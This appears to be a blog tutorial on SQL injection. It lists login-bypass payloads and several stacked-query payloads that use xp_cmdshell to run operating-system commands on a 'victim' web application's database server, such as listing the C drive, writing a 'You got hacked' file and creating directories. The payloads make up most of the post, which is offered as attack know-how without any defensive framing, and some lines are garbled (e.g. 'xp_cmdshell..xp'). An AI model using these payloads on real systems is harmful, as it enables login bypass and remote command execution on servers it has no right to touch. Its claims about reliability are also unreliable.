SQL Injection Just A Little Beyond Injection

f you have been a regular reader of my blog then you might remember following type of SQL queries,

1 ‘ OR ‘ 1 ‘ = ‘ 1
a ‘ OR ‘ 1 ‘ = ‘ 1
a ‘ OR ‘ a ‘ = ‘ a
Login: 1 ‘ OR ‘ 1 ‘ = ‘ 1
Password : 1 ‘ OR ‘ 1 ‘ = ‘ 1
http://victim/index.asp?id=1 ‘ OR ‘ 1 ‘ = ‘ 1
and similar variants they all are usually used to bypass login page. By the while discussing SQL injection several times I mentioned that SQL injection is kinda command injection attack. You might wonder a little if SQL injection is kinda command injection attack then how I can execute commands using it. I intentionally left command injection part in SQL injection to cover it while discussing command injection.
First of all command injection using SQL injection works only on windows based shell means it will not work on Linux. Now how it works, as we know that SQL injection is not only a command injection it is also a code injection attack because each statement in SQL injection is interpreted code which terminates with ‘ ; ‘ (semicolon) which acts as statement terminator. While SQL injection you intentionally never use statement terminator because you already know web application does it automatically. While injecting commands a hacker can exploit this to execute commands using SQL injection by terminating statement and appending following command.
exec master..xp_cmdshell “<shell command>” —
If victim is vulnerable to command injection attack via SQL injection then any SQL query you can inject will 100% support above appended code, have a look on following examples,
1 ‘ OR ‘ 1 ‘ = ‘ 1 ‘ ; exec master..xp_cmdshell “dir c:\” –
1 ‘ ; exec master..xp_cmdshell “dir c:\” –
Above commands will list all folders and files in C drive of vicim,
a ‘ OR ‘ 1 ‘ = ‘ 1 ; exec master..xp_cmdshell “echo You got hacked>file.txt ” –
a ‘ ; exec master..xp_cmdshell “echo You got hacked>file.txt ” –
Above statement will add a file in system with message You Got Hacked.
a ‘ OR ‘ a ‘ = ‘ a ‘; exec master..xp_cmdshell..xp “ping 127.0.0.1” —
Login: 1 ‘ OR ‘ 1 ‘ = ‘ 1 ‘ ; exec master..xp_cmdshell..xp “ping 127.0.0.1” —
Above statement will ping victim system.
Password : 1 ‘ OR ‘ 1 ‘ = ‘ 1 ‘ ; exec master..xp_cmdshell “ver” –
Above statement will display name and version of victim system. And there should be no surprise because even this works,
http://victim/index.asp?id=1 ‘ OR ‘ 1 ‘ = ‘ 1 ‘ ; exec master..xp_cmdshell “mkdir hacker” —

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s